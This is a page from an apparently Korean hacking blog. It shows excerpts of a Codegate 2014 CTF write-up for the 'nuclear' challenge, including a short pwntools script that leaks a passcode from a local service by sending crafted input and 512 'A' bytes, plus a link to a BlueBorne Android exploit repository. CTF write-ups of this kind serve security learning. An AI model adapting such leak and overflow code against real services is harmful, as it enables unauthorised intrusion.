Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 | 31 |
Tags
- Hacking
- 도메인 https
- openctf
- blueborne
- shellcraft
- https설정
- pwntools
- lob
- Codegate
- CVE
- codegate2017
- Branch
- npm
- node.js
- module
- 코드게이트
- 코드게이트 주니어
- CODEGATE2018
- 노드 엑셀
- Git
- xlsx
- NGINX
- BLUETOOTH
- gogs private git
- doorlock
- 코드게이트2017
- https
- node
- gogs
- pwnable
Archives
- Today
- Total
고졸백수해킹일기
codegate2014 nuclear
바이너리를 보면 무슨 패스코드 파일을 읽어와서 input값이랑 비교하는데target메뉴 이후 입력받는 과정에서 릭을 하면 passcode를 읽어올 수 있다.아래는 릭 코드#####leak######from pwn import *import times = remote('localhost',1129) print s.recv(1024)s.sendline('target')time.sleep(1)print s.recv(1024)s.sendline('1094795585.000000/1094795585.000000')time.sleep(1)print s.recv()s.sendline('A'*512)time.sleep(1)print s.recv(4096) 이후 실행되는 start_routine이라는 곳에서 오버플로가 ..
Pwnable
2018. 3. 9. 23:48
[Andriod] blueborne
https://github.com/ArmisSecurity/blueborne
CVE-Exploits
2018. 3. 7. 05:32